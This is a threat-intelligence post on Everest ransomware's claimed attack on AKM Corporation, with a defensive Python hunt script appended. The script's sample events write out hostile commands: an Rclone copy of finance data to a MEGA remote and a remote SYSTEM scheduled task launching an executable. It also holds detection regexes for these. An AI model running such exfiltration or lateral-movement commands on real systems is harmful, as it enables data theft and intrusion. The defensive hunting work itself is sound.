On May 28, 2026, the Everest ransomware group claimed responsibility for a cyberattack against AKM Corporation (akmcorp.com), a US-based technology firm. The threat actors have publicly threatened to release sensitive corporate data unless a ransom is paid, marking another high-profile victim in Everest's expanding 2026 campaign.
What Happened
Everest added AKM Corporation to its dark web leak site on May 28, 2026, accompanied by a statement reading: "The full leak will be published soon, unless a company representative contacts us via the channels provided." The posting follows Everest's established double-extortion playbook, where data exfiltration precedes or accompanies encryption, giving operators leverage even against victims with viable backups. AKM Corporation, a technology firm headquartered in the United States, has not yet issued a public response to the claim, and the volume of stolen data has not been confirmed.
What Was Taken
Everest's listing references "sensitive corporate data" without itemizing specific datasets at the time of posting. Based on the group's historical operating pattern, exfiltrated material typically includes internal corporate documents, employee records, financial files, client information, source code, and credential stores. For a technology firm, the exposure surface is particularly acute: intellectual property, customer environments, API keys, and SaaS tenant data are all plausible targets. A sample drop is expected before any full leak, consistent with the group's pressure tactics.
Why It Matters
Everest has steadily gained prominence in the ransomware ecosystem since pivoting from pure encryption to data-broker tactics, and it frequently sells access to other affiliates when victims refuse to pay. A breach at a US technology company introduces downstream supply chain risk: AKM's customers, partners, and integrated vendors may face secondary exposure through stolen credentials, configuration data, or embedded access tokens. Defenders monitoring third-party risk should treat any AKM relationship as elevated until scope is clarified.
The Attack Technique
Initial access vectors have not been disclosed. Everest affiliates have historically relied on valid account compromise sourced from infostealer logs, exploitation of unpatched edge devices (VPN concentrators, firewalls, file transfer appliances), and phishing payloads delivering loader malware. Post-access, the group typically deploys living-off-the-land tooling, abuses RMM software for persistence, and uses Rclone or MEGA clients for bulk exfiltration before detonating ransomware. Organizations should assume credential theft preceded the intrusion by weeks.
What Organizations Should Do
- Hunt for Everest indicators: Search EDR and SIEM telemetry for known Everest TTPs, including unauthorized Rclone usage, suspicious PowerShell encoded commands, and scheduled tasks linked to lateral movement.
- Rotate exposed credentials: Any organization with a vendor relationship to AKM Corporation should rotate shared secrets, API keys, and federated access tokens as a precaution.
- Validate offline backups: Confirm immutable, air-gapped backups are current and successfully restorable. Test recovery against ransomware-specific scenarios.
- Enforce MFA on all external access: This applies especially to VPN, RDP, email, and identity provider portals; phishing-resistant MFA (FIDO2) should be prioritized for privileged accounts.
- Monitor dark web exposure: Track Everest's leak site for sample drops and scan infostealer marketplaces for credentials tied to AKM domains and partner accounts.
- Engage incident response counsel early: Legal, regulatory, and negotiation considerations should be coordinated before any contact with the threat actor, particularly given OFAC and disclosure obligations.
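A small hunt script, added here as an illustration and not taken from DeXpose or any Everest reporting, that applies the three TTP checks named above (Rclone runs with a remote destination, encoded PowerShell commands, remote scheduled-task creation) to constructed Sysmon-style process-creation events; the hostnames, users and command lines are made-up sample data, and the encoded payload is a benign stand-in.

```python
import base64
import re
# -EncodedCommand accepts any unambiguous prefix (-e, -enc, ...); its argument is base64 of UTF-16LE text.
PS_ENC_RE = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# schtasks /Create with /S <host> creates the task on a remote machine (a lateral-movement pattern).
SCHTASKS_REMOTE_RE = re.compile(r"/create\b.*?\s/s\s+(\S+)", re.I)
# An rclone remote looks like "name:path"; the lookahead excludes Windows drive letters such as D:\Finance.
RCLONE_REMOTE_RE = re.compile(r"^([A-Za-z][\w-]*):(?!\\)")

def build_sample_events():
    """Constructed Sysmon-style process-creation events; hosts, users and commands are made up."""
    enc = base64.b64encode("Get-Process".encode("utf-16le")).decode()  # benign stand-in payload
    return [
        {"host": "WS-14", "user": "CORP\\jdoe",
         "cmdline": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\rclone.exe copy D:\\Finance mega:backup --transfers 16"},
        {"host": "WS-14", "user": "CORP\\jdoe", "cmdline": f"powershell.exe -nop -w hidden -enc {enc}"},
        {"host": "WS-14", "user": "CORP\\jdoe",
         "cmdline": "schtasks.exe /Create /S FS-02 /RU SYSTEM /TN Updater /TR C:\\Temp\\u.exe /SC ONCE /ST 23:00"},
        {"host": "WS-07", "user": "CORP\\asmith", "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
    ]

def decode_encoded_command(b64):
    """Decode an -EncodedCommand argument so the analyst sees the script text; None if malformed."""
    try:
        return base64.b64decode(b64).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(ev):
    """Return (tactic, detail) findings for one event; a whitespace split suffices for these samples."""
    tokens = ev["cmdline"].split()
    exe = tokens[0].rsplit("\\", 1)[-1].lower()  # basename of the launched image
    findings = []
    if exe.startswith("rclone"):
        remotes = [m.group(1) for t in tokens[1:] if (m := RCLONE_REMOTE_RE.match(t))]
        if remotes:
            findings.append(("exfiltration", f"rclone to remote {remotes[0]}"))
    elif exe.startswith(("powershell", "pwsh")):
        if m := PS_ENC_RE.search(ev["cmdline"]):
            findings.append(("execution", f"encoded PowerShell: {decode_encoded_command(m.group(1))!r}"))
    elif exe.startswith("schtasks"):
        if m := SCHTASKS_REMOTE_RE.search(ev["cmdline"]):
            findings.append(("lateral_movement", f"remote scheduled task on {m.group(1)}"))
    return findings

def hunt(events):
    """Run every check over a batch of events; each hit is tagged with host and user for triage."""
    return [{"host": ev["host"], "user": ev["user"], "tactic": t, "detail": d}
            for ev in events for t, d in analyze_event(ev)]
```

Feeding real EDR process-creation events through `hunt()` requires a proper command-line tokenizer that handles quoted paths; the whitespace split is only adequate for the embedded samples.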
Sources: Everest Ransomware Strikes AKM Corporation - DeXpose